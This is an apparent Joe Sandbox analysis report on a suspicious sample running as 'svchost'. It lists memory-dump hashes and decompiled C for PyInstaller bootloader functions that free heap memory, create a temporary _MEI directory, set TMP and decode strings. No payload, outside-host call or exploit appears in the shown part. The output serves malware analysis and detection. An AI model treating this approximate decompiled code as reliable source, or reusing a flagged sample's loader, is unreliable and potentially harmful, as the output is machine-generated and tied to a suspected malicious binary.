                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 704cc8030f74d67a847f607f9e3f4fa5301ae54362fc77ed6feaf1992b1ded1c
                            • Instruction ID: f75a9bd5f9dc91ea1eb81194365797b9e55122b06226fe0dafa3bb2252ff3465
                            • Opcode Fuzzy Hash: 704cc8030f74d67a847f607f9e3f4fa5301ae54362fc77ed6feaf1992b1ded1c
                            • Instruction Fuzzy Hash: B93138716006019FEB21AA6AD846B5BF3E9EF10B11F1049ABF459D7252EF34AC40CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC2210, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 131COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s.py$Could not get __main__ module's dict.$Could not get __main__ module.$Failed to execute script %s$Failed to unmarshal code object for %s$Name exceeds PATH_MAX$__file__$__main__
                            • API String ID: 0-2368408649
                            • Opcode ID: f9ef3641f2492287772c3926582e1b563e671e0ed8577cc20ddcfc77ad9ed5d8
                            • Instruction ID: 629c48bde79b9bf758f21a8e5eaa54c42d9692f4bdd0c63d363066ad1ecc50c6
                            • Opcode Fuzzy Hash: f9ef3641f2492287772c3926582e1b563e671e0ed8577cc20ddcfc77ad9ed5d8
                            • Instruction Fuzzy Hash: 61416EB59042806FD710A739EC86F5B7BD8FF84321F0406A9F809D6193EFB9D58586A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC3230, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 105COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: Failed to get _MEIPASS as PyObject.$_MEIPASS$loads$marshal$mod is NULL - %s$strict$utf-8
                            • API String ID: 2009864989-3336796446
                            • Opcode ID: 643d292588b071c332a98eefd0028075efc16ad7240dcd1b0f7dceea256be3b7
                            • Instruction ID: d2e59c78d3e2a6452f53d8c29e55124e93e8d169c30e3e4b30def1231b14db3f
                            • Opcode Fuzzy Hash: 643d292588b071c332a98eefd0028075efc16ad7240dcd1b0f7dceea256be3b7
                            • Instruction Fuzzy Hash: 183157765002406FCB102B79AC8AE6B7FECEA817117448999F807E7153EF31EA1186A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD4331, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BD4331(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xbe5190) {
					E00BD09EB(_t52);
					_t26 = _a4;
				}
				E00BD09EB( *((intOrPtr*)(_t26 + 0x3c)));
				E00BD09EB( *((intOrPtr*)(_a4 + 0x30)));
				E00BD09EB( *((intOrPtr*)(_a4 + 0x34)));
				E00BD09EB( *((intOrPtr*)(_a4 + 0x38)));
				E00BD09EB( *((intOrPtr*)(_a4 + 0x28)));
				E00BD09EB( *((intOrPtr*)(_a4 + 0x2c)));
				E00BD09EB( *((intOrPtr*)(_a4 + 0x40)));
				E00BD09EB( *((intOrPtr*)(_a4 + 0x44)));
				E00BD09EB( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00BD41F7(5,  &_v8);
				_v8 =  &_a4;
				return E00BD4247(4,  &_v8);
			}




                            0x00bd4337
                            0x00bd433a
                            0x00bd4342
                            0x00bd4345
                            0x00bd434a
                            0x00bd434d
                            0x00bd4351
                            0x00bd435c
                            0x00bd4367
                            0x00bd4372
                            0x00bd437d
                            0x00bd4388
                            0x00bd4393
                            0x00bd439e
                            0x00bd43ac
                            0x00bd43b4
                            0x00bd43bd
                            0x00bd43c5
                            0x00bd43d9

                            APIs
                            • _free.LIBCMT ref: 00BD4345
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD4351
                            • _free.LIBCMT ref: 00BD435C
                            • _free.LIBCMT ref: 00BD4367
                            • _free.LIBCMT ref: 00BD4372
                            • _free.LIBCMT ref: 00BD437D
                            • _free.LIBCMT ref: 00BD4388
                            • _free.LIBCMT ref: 00BD4393
                            • _free.LIBCMT ref: 00BD439E
                            • _free.LIBCMT ref: 00BD43AC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d22e4b2c01271c4b22aaab72fafc2a9271ccd48c8feecd5a409c4080daf9414b
                            • Instruction ID: 567ba23588019600bcb48eed4f8a32dc1ad86ab53e70a2a243219e8ce6c747f0
                            • Opcode Fuzzy Hash: d22e4b2c01271c4b22aaab72fafc2a9271ccd48c8feecd5a409c4080daf9414b
                            • Instruction Fuzzy Hash: 091107B6111008AFDB01FF59C892EDE7BA5EF15350F0040A2F9494B222E631DE51DB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC3C70, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                            Download Yara Rule
                            C-Code - Quality: 64%
                            			E00BC3C70(void* __edx, char _a4, short _a36, signed int _a8228, intOrPtr _a8236, intOrPtr _a8240) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				signed int _t13;
				intOrPtr _t24;
				void* _t27;
				WCHAR* _t28;
				WCHAR* _t37;
				intOrPtr _t45;
				void* _t47;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t72;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				E00BC7880();
				_t13 =  *0xbec008; // 0xdc55bb75
				_a8228 = _t13 ^ _t74;
				_push(_t50);
				_t72 = _a8240;
				_v0 = _a8236;
				_push(_t57);
				if(_t72 == 0) {
					_t51 = _v0;
					L6:
					GetTempPathW(0x1000,  &_a36);
					E00BC4710(_t53,  &_a4, 0x10, L"_MEI%d", GetCurrentProcessId());
					_t75 = _t74 + 0x10;
					_t64 = 0;
					__eflags = 0;
					while(1) {
						_t58 = E00BCF329( &_a36,  &_a4);
						_t24 = E00BC4B30();
						_t76 = _t75 + 0xc;
						__eflags = _t24;
						if(_t24 == 0) {
							break;
						}
						L00BC9803(_t58);
						_t64 = _t64 + 1;
						_t75 = _t76 + 4;
						__eflags = _t64 - 5;
						if(_t64 < 5) {
							continue;
						}
						__eflags = _t72;
						if(_t72 == 0) {
							L4:
							_t27 = 0;
							L18:
							E00BC786A();
							return _t27;
						}
						_t37 = E00BC4BF0(0, "TMP", 0);
						__eflags = _t51;
						if(_t51 == 0) {
							_t68 = _t37;
							SetEnvironmentVariableW(_t37, 0);
							L00BC9803(_t68);
							_t77 = _t75 + 0x10;
							_t27 = 0;
						} else {
							_t61 = _t37;
							_t69 = E00BC4BF0(0, _t51, 0);
							E00BCE1FC(_t37, _t40);
							L00BC9803(_t61);
							L00BC9803(_t69);
							L00BC9803(_t51);
							_t77 = _t75 + 0x2c;
							_t27 = 0;
						}
						goto L18;
					}
					E00BC4C90(_v0, _t58, 0x1000);
					L00BC9803(_t58);
					_t77 = _t76 + 0x10;
					__eflags = _t72;
					if(_t72 != 0) {
						_t28 = E00BC4BF0(0, "TMP", 0);
						__eflags = _t51;
						if(_t51 == 0) {
							_t66 = _t28;
							SetEnvironmentVariableW(_t28, 0);
							L00BC9803(_t66);
							_t77 = _t77 + 0x10;
						} else {
							_t60 = _t28;
							_t67 = E00BC4BF0(0, _t51, 0);
							E00BCE1FC(_t28, _t31);
							L00BC9803(_t60);
							L00BC9803(_t67);
							L00BC9803(_t51);
							_t77 = _t77 + 0x2c;
						}
					}
					_t27 = 1;
					goto L18;
				}
				_push("TMP");
				_t45 = E00BC3E40(_t50, _t57);
				_push(_t72);
				_t51 = _t45;
				_t62 = E00BC3980();
				_t77 = _t74 + 8;
				if(_t46 == 0) {
					goto L4;
				}
				_t47 = E00BCE1FC(L"TMP", _t62);
				L00BC9803(_t62);
				_t74 = _t77 + 0xc;
				_t83 = _t47;
				if(_t47 == 0) {
					goto L6;
				} else {
					_push("LOADER: Failed to set the TMP environment variable.\n");
					E00BC1910(_t83);
					_t77 = _t74 + 4;
					goto L4;
				}
			}























                            0x00bc3c75
                            0x00bc3c7a
                            0x00bc3c81
                            0x00bc3c8f
                            0x00bc3c91
                            0x00bc3c98
                            0x00bc3c9d
                            0x00bc3ca0
                            0x00bc3ceb
                            0x00bc3cef
                            0x00bc3cf9
                            0x00bc3d11
                            0x00bc3d16
                            0x00bc3d19
                            0x00bc3d19
                            0x00bc3d20
                            0x00bc3d2f
                            0x00bc3d32
                            0x00bc3d37
                            0x00bc3d3a
                            0x00bc3d3c
                            0x00000000
                            0x00000000
                            0x00bc3d3f
                            0x00bc3d44
                            0x00bc3d45
                            0x00bc3d48
                            0x00bc3d4b
                            0x00000000
                            0x00000000
                            0x00bc3d4d
                            0x00bc3d4f
                            0x00bc3ce4
                            0x00bc3ce4
                            0x00bc3e25
                            0x00bc3e32
                            0x00bc3e3d
                            0x00bc3e3d
                            0x00bc3d5a
                            0x00bc3d5f
                            0x00bc3d61
                            0x00bc3d97
                            0x00bc3d9c
                            0x00bc3da3
                            0x00bc3da8
                            0x00bc3dab
                            0x00bc3d63
                            0x00bc3d68
                            0x00bc3d6f
                            0x00bc3d73
                            0x00bc3d79
                            0x00bc3d7f
                            0x00bc3d85
                            0x00bc3d8a
                            0x00bc3d8d
                            0x00bc3d8d
                            0x00000000
                            0x00bc3d61
                            0x00bc3db9
                            0x00bc3dbf
                            0x00bc3dc4
                            0x00bc3dc7
                            0x00bc3dc9
                            0x00bc3dd4
                            0x00bc3dd9
                            0x00bc3ddb
                            0x00bc3e0c
                            0x00bc3e11
                            0x00bc3e18
                            0x00bc3e1d
                            0x00bc3ddd
                            0x00bc3de2
                            0x00bc3de9
                            0x00bc3ded
                            0x00bc3df3
                            0x00bc3df9
                            0x00bc3dff
                            0x00bc3e04
                            0x00bc3e04
                            0x00bc3ddb
                            0x00bc3e20
                            0x00000000
                            0x00bc3e20
                            0x00bc3ca2
                            0x00bc3ca7
                            0x00bc3cac
                            0x00bc3cad
                            0x00bc3cb4
                            0x00bc3cb6
                            0x00bc3cbb
                            0x00000000
                            0x00000000
                            0x00bc3cc3
                            0x00bc3ccb
                            0x00bc3cd0
                            0x00bc3cd3
                            0x00bc3cd5
                            0x00000000
                            0x00bc3cd7
                            0x00bc3cd7
                            0x00bc3cdc
                            0x00bc3ce1
                            0x00000000
                            0x00bc3ce1

                            APIs
                            • GetTempPathW.KERNEL32(00001000,?,?,?,00000000,00000000,00BC3C46,?,00000000,?,pyi-runtime-tmpdir), ref: 00BC3CF9
                            • GetCurrentProcessId.KERNEL32 ref: 00BC3CFF
                              • Part of subcall function 00BC3E40: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,00BC24FE,_MEIPASS2), ref: 00BC3E76
                              • Part of subcall function 00BC3E40: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,00BC24FE,_MEIPASS2), ref: 00BC3E92
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,00000000,00BC210F,?,?,00000000,?,00000000), ref: 00BC3D9C
                              • Part of subcall function 00BC4C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00BC48EC,00BF4A58,?,00001000,?,?), ref: 00BC4CAA
                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,?,?,00000000,00BC210F,?,?), ref: 00BC3E11
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Environment$Variable$ByteCharMultiWide$CurrentExpandPathProcessStringsTemp
                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                            • API String ID: 2172272190-1116378104
                            • Opcode ID: d31de34840c7bf0c73eb1ca2ee161ab55d295d9e98128c784bb63d20e8fb3b41
                            • Instruction ID: fd155ac0a6d051175b1ed4d0e1742bc886125856642fe7726fe8dbba79917ad3
                            • Opcode Fuzzy Hash: d31de34840c7bf0c73eb1ca2ee161ab55d295d9e98128c784bb63d20e8fb3b41
                            • Instruction Fuzzy Hash: F441D3B2A0034176F22176B45C8BF6F71E8DF46F81F5404AEFA05A7183EEA59E0542A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC3980, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E00BC3980(short _a8192, signed int _a16384, intOrPtr _a16392) {
				short _v0;
				void* __edi;
				signed int _t14;
				signed int _t19;
				void* _t43;
				WCHAR* _t57;
				signed int _t58;
				WCHAR* _t65;
				signed int _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				E00BC7880();
				_t14 =  *0xbec008; // 0xdc55bb75
				_a16384 = _t14 ^ _t69;
				_t57 = E00BC4BF0(0, _a16392, 0);
				_t70 = _t69 + 0xc;
				_t82 = _t57;
				if(_t57 != 0) {
					_t19 = ExpandEnvironmentStringsW(_t57,  &_a8192, 0x1000);
					L00BC9803(_t57);
					_t71 = _t70 + 4;
					__eflags = _t19;
					if(__eflags != 0) {
						_t65 = E00BCD518(0,  &_a8192, 0x1000);
						_t72 = _t71 + 0xc;
						__eflags = _t65;
						if(__eflags != 0) {
							E00BC8520(_t57,  &_v0, 0, 0x2000);
							_push(0x5c);
							_push(_t65);
							_t58 = E00BC88E7(_t43);
							_t73 = _t72 + 0x14;
							__eflags = _t58;
							while(_t58 != 0) {
								E00BCDC18( &_v0, _t65, (_t58 - _t65 >> 1) + 1);
								CreateDirectoryW( &_v0, 0);
								_t11 = _t58 + 2; // 0x2
								_push(0x5c);
								_t58 = E00BC88E7((_t58 - _t65 >> 1) + 1);
								_t73 = _t73 + 0x14;
								__eflags = _t58;
							}
							CreateDirectoryW(_t65, 0);
							__eflags = _a16384 ^ _t73;
							E00BC786A();
							return _t65;
						} else {
							_push("LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n");
							E00BC1910(__eflags);
							__eflags = _a16384 ^ _t72 + 0x00000004;
							E00BC786A();
							return 0;
						}
					} else {
						_push("LOADER: Failed to expand environment variables in the runtime-tmpdir.\n");
						E00BC1910(__eflags);
						__eflags = _a16384 ^ _t71 + 0x00000004;
						E00BC786A();
						return 0;
					}
				} else {
					_push("LOADER: Failed to convert runtime-tmpdir to a wide string.\n");
					E00BC1910(_t82);
					E00BC786A();
					return 0;
				}
			}
















                            0x00bc3985
                            0x00bc398a
                            0x00bc3991
                            0x00bc39aa
                            0x00bc39ac
                            0x00bc39af
                            0x00bc39b1
                            0x00bc39e7
                            0x00bc39f0
                            0x00bc39f5
                            0x00bc39f8
                            0x00bc39fa
                            0x00bc3a36
                            0x00bc3a38
                            0x00bc3a3b
                            0x00bc3a3d
                            0x00bc3a72
                            0x00bc3a77
                            0x00bc3a79
                            0x00bc3a85
                            0x00bc3a87
                            0x00bc3a8a
                            0x00bc3a8c
                            0x00bc3a9e
                            0x00bc3aad
                            0x00bc3aaf
                            0x00bc3ab2
                            0x00bc3aba
                            0x00bc3abc
                            0x00bc3abf
                            0x00bc3abf
                            0x00bc3ac6
                            0x00bc3ad4
                            0x00bc3ad6
                            0x00bc3ae1
                            0x00bc3a3f
                            0x00bc3a3f
                            0x00bc3a44
                            0x00bc3a57
                            0x00bc3a59
                            0x00bc3a64
                            0x00bc3a64
                            0x00bc39fc
                            0x00bc39fc
                            0x00bc3a01
                            0x00bc3a14
                            0x00bc3a16
                            0x00bc3a21
                            0x00bc3a21
                            0x00bc39b3
                            0x00bc39b3
                            0x00bc39b8
                            0x00bc39cc
                            0x00bc39d7
                            0x00bc39d7

                            APIs
                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,00BC210F,?,?,00000000,?,00000000), ref: 00BC39E7
                            Strings
                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00BC39FC
                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00BC39B3
                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00BC3A3F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentExpandMultiStringsWide
                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                            • API String ID: 2001182103-3498232454
                            • Opcode ID: 92471abe6d23320bbf0de72325d3c0be72332adb09962964ebaf1c97c919303d
                            • Instruction ID: f951d37ae600e750f31c500ac0d651e434b97c26fc60ae661032f4d3ecb39b96
                            • Opcode Fuzzy Hash: 92471abe6d23320bbf0de72325d3c0be72332adb09962964ebaf1c97c919303d
                            • Instruction Fuzzy Hash: E431ECB6A442006BE624F368AC47F9F72D8EF84750F44456DFB49D7282FEB49900C697
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4A10, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 105COMMON
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E00BC4A10(void* __ecx, void* __edx, void* __eflags) {
				int* _t18;
				char* _t21;
				short* _t22;
				char* _t28;
				int* _t31;
				void* _t34;
				char* _t36;
				int* _t41;
				signed int _t42;
				signed int _t44;
				int _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_t34 = __edx;
				_t44 =  *(_t46 + 0x14);
				_push(4);
				_push(_t44 + 1);
				_t18 = E00BC97F8(__ecx);
				_t31 = _t18;
				_t47 = _t46 + 8;
				if(_t31 != 0) {
					_t36 = 0;
					__eflags = _t44;
					if(_t44 <= 0) {
						L16:
						_t31[_t44] = 0;
						return _t31;
					} else {
						_t41 = _t31;
						_t21 =  *(_t47 + 0x20) - _t31;
						__eflags = _t21;
						 *(_t47 + 0x20) = _t21;
						while(1) {
							_t22 = _t21[_t41];
							 *(_t47 + 0x30) = _t22;
							_t45 = WideCharToMultiByte(0xfde9, 0, _t22, 0xffffffff, 0, 0, 0, 0);
							__eflags = _t45;
							if(__eflags == 0) {
								break;
							}
							_t7 = _t45 + 1; // 0x1
							_push(1);
							_push(_t7);
							_t28 = E00BC97F8(_t7);
							_t47 = _t47 + 8;
							 *(_t47 + 0x14) = _t28;
							__eflags = _t28;
							if(__eflags == 0) {
								_push("Out of memory.");
								_push("win32_utils_to_utf8");
								goto L13;
							} else {
								__eflags = WideCharToMultiByte(0xfde9, 0,  *(_t47 + 0x24), 0xffffffff, _t28, _t45, 0, 0);
								if(__eflags == 0) {
									_push("Failed to encode wchar_t as UTF-8.\n");
									L12:
									_push("WideCharToMultiByte");
									L13:
									E00BC1860(_t34, __eflags);
									_t48 = _t47 + 8;
									 *_t41 = 0;
									_t42 = 0;
									__eflags = _t36;
									if(_t36 >= 0) {
										do {
											L00BC9803(_t31[_t42]);
											_t42 = _t42 + 1;
											_t48 = _t48 + 4;
											__eflags = _t42 - _t36;
										} while (_t42 <= _t36);
									}
									L00BC9803(_t31);
									__eflags = 0;
									return 0;
								} else {
									_t36 =  &(_t36[1]);
									_t44 =  *(_t47 + 0x1c);
									 *_t41 =  *(_t47 + 0x14);
									_t41 =  &(_t41[1]);
									__eflags = _t36 - _t44;
									if(_t36 >= _t44) {
										goto L16;
									} else {
										_t21 =  *(_t47 + 0x20);
										continue;
									}
								}
							}
							goto L17;
						}
						_push("Failed to get UTF-8 buffer size.\n");
						goto L12;
					}
				} else {
					return _t18;
				}
				L17:
			}

















                            0x00bc4a10
                            0x00bc4a15
                            0x00bc4a19
                            0x00bc4a1e
                            0x00bc4a1f
                            0x00bc4a24
                            0x00bc4a26
                            0x00bc4a2b
                            0x00bc4a35
                            0x00bc4a37
                            0x00bc4a39
                            0x00bc4b14
                            0x00bc4b16
                            0x00bc4b24
                            0x00bc4a3f
                            0x00bc4a43
                            0x00bc4a45
                            0x00bc4a45
                            0x00bc4a47
                            0x00bc4a50
                            0x00bc4a50
                            0x00bc4a65
                            0x00bc4a6f
                            0x00bc4a71
                            0x00bc4a73
                            0x00000000
                            0x00000000
                            0x00bc4a75
                            0x00bc4a78
                            0x00bc4a7a
                            0x00bc4a7b
                            0x00bc4a80
                            0x00bc4a83
                            0x00bc4a87
                            0x00bc4a89
                            0x00bc4ac7
                            0x00bc4acc
                            0x00000000
                            0x00bc4a8b
                            0x00bc4aa4
                            0x00bc4aa6
                            0x00bc4ac0
                            0x00bc4ad8
                            0x00bc4ad8
                            0x00bc4add
                            0x00bc4add
                            0x00bc4ae2
                            0x00bc4ae5
                            0x00bc4aeb
                            0x00bc4aed
                            0x00bc4aef
                            0x00bc4af1
                            0x00bc4af4
                            0x00bc4af9
                            0x00bc4afa
                            0x00bc4afd
                            0x00bc4afd
                            0x00bc4af1
                            0x00bc4b02
                            0x00bc4b0a
                            0x00bc4b13
                            0x00bc4aa8
                            0x00bc4aac
                            0x00bc4aad
                            0x00bc4ab1
                            0x00bc4ab3
                            0x00bc4ab6
                            0x00bc4ab8
                            0x00000000
                            0x00bc4aba
                            0x00bc4aba
                            0x00000000
                            0x00bc4aba
                            0x00bc4ab8
                            0x00bc4aa6
                            0x00000000
                            0x00bc4a89
                            0x00bc4ad3
                            0x00000000
                            0x00bc4ad3
                            0x00bc4a32
                            0x00bc4a32
                            0x00bc4a32
                            0x00000000

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 00BC4A69
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 00BC4A9E
                            Strings
                            • Failed to encode wchar_t as UTF-8., xrefs: 00BC4AC0
                            • WideCharToMultiByte, xrefs: 00BC4AD8
                            • Failed to get UTF-8 buffer size., xrefs: 00BC4AD3
                            • Out of memory., xrefs: 00BC4AC7
                            • win32_utils_to_utf8, xrefs: 00BC4ACC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 626452242-3595433791
                            • Opcode ID: bf3de860c0e8ee18e01cb18fb08c25fa16f28ed3757b14110513df5ef1dc0b6b
                            • Instruction ID: 28a51685537028af42270ae5cf207273e0cfcec2e519b51576db300d89958a73
                            • Opcode Fuzzy Hash: bf3de860c0e8ee18e01cb18fb08c25fa16f28ed3757b14110513df5ef1dc0b6b
                            • Instruction Fuzzy Hash: 78318B757843056BEB20AF58AC82F5673D4EB40711F1005AEFE45B72C1EBB6EA048362
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC1030, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 76COMMON
                            Download Yara Rule
                            C-Code - Quality: 47%
                            			E00BC1030(void* __eax, void* __ecx, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _t20;
				intOrPtr _t35;
				intOrPtr _t36;

				_t35 = _a8;
				_push( *((intOrPtr*)(_t35 + 0xc)));
				L00BC7864();
				_t36 = E00BC9808(__ecx);
				_t46 = _t36;
				if(_t36 != 0) {
					_t20 = _v0;
					_push( *((intOrPtr*)(_t35 + 8)));
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v60 = _t20;
					L00BC7864();
					_push( *((intOrPtr*)(_t35 + 0xc)));
					_v60 = _t20;
					_v52 = _t36;
					L00BC7864();
					_v52 = _t20;
					__eflags = E00BC6720( &_v68, "1.2.11", 0x38);
					if(__eflags < 0) {
						_push(_v44);
						E00BC1980(__eflags, "Error %d from inflateInit: %s\n", _t22);
						__eflags = 0;
						return 0;
					} else {
						_push(4);
						_push( &_v68);
						__eflags = E00BC4E60();
						if(__eflags < 0) {
							_push(_v44);
							E00BC1980(__eflags, "Error %d from inflate: %s\n", _t26);
							__eflags = 0;
							return 0;
						} else {
							E00BC65F0( &_v68);
							return _t36;
						}
					}
				} else {
					_push("Error allocating decompression buffer\n");
